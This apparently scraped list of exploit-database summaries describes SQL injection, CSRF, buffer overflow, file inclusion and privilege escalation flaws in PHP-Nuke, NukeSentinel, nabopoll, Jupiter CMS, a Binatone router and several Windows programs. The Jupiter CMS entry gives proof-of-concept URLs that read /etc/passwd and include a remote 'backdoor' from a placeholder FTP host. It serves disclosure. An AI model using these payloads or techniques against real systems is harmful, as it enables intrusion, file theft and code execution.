This is a 0day exploit for PHP-nuke version <=8.0 Final. It is a SQL injection attack in the INSERT syntax when the 'HTTP Referers' block is on. The exploit allows an attacker to view the login and hash on the web page in the 'HTTP referers' block.
Binatone DT 850W Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password, SSId of Wireless network, Reboot Router, Reset Router, Change Router's Admin Password by simply making the user visit a CSRF link.
By setting UserID in the cookie to a long string, we can overwrite EDX which allows us to control execution flow when "call dword ptr [edx+28h]" is executed. EDX is overwritten with an address pointing to a location on the stack which in turn points to a NOP sled leading to the shellcode.
Power2Go uses registry keys to set various attributes including the registered username. The registered username is loaded into memory for display when the "About" screen is opened. These registry values can be found here: HKEY_LOCAL_MACHINESOFTWARECyberLinkPower2Go99.0. It loads these values into memory without proper bounds checks which enables the exploit. To exploit, run created .reg file, open Power2Go, and click on Power2Go Logo in the upper left corner. Once the registry has been modified, this exploit will be persistent and execute every time the application is run and the "About" screen is opened.
This exploit targets the NukeSentinel 2.5.05 module and allows for SQL injection and file disclosure. It may work on other versions as well. The exploit takes advantage of a vulnerability in the nukesentinel.php file, specifically in the handling of the 'client_ip' parameter. By manipulating the 'Client-IP' header, an attacker can disclose sensitive files on the server.
By setting UserID in the cookie to a long string, we can overwrite EDX which allows us to control execution flow when the following instruction is executed. We can point EDX+28 to a location in the stack containing a pointer to instructions we want to execute. This pointer can be placed at 0x01??6969. Under Windows XP Professional SP2/SP3, the first, third, and fourth bytes in the address are always the same. The second byte is random so we need to bruteforce it. This takes at most 255 tries and the server doesn't crash so we can keep trying. The pointer placed at 0x01??6969 is a pointer to a CALL ESI. ESI points to a small space in our payload. We fill this small space with instructions to jump further down the stack where our shellcode is stored. Tested with Easy File Sharing Webserver installed in the default location at C:EFS SoftwareEasy File Sharing Web Server
This exploit allows an attacker to include remote files by manipulating the 'path' parameter in the 'survey.inc.php' file of the 'nabopoll' script. By providing a malicious URL as the 'path' parameter, an attacker can execute arbitrary code on the target system.
The script 'index.php' in Jupiter CMS 1.1.5 allows local file inclusion if magic_quotes_gpc is set to Off, and remote file inclusion if PHP version is >= 5.0.0 and allow_url_fopen is set to On. The 'n' parameter in 'index.php' is not properly filtered, allowing an attacker to include arbitrary files. A null byte char is required for local file inclusion. Simple Proof of Concept (PoC): LFI: http://<host><path>/index.php?n=/etc/passwd%00 RFI: http://<host><path>/index.php?n=ftp://user:password@example.com/backdoor
Access without password to the admin config_edit.php, template_edit.php, and survey_edit.php files in nabopoll 1.1.2.
This exploit allows an attacker to escalate their privileges by exploiting a vulnerability in the lpNet service and the creation of temporary files with improper permissions. By creating a symbolic link to the .rhosts file of the lp user in the temporary file location, the attacker can gain root access or execute arbitrary commands with elevated privileges.
Services By CQR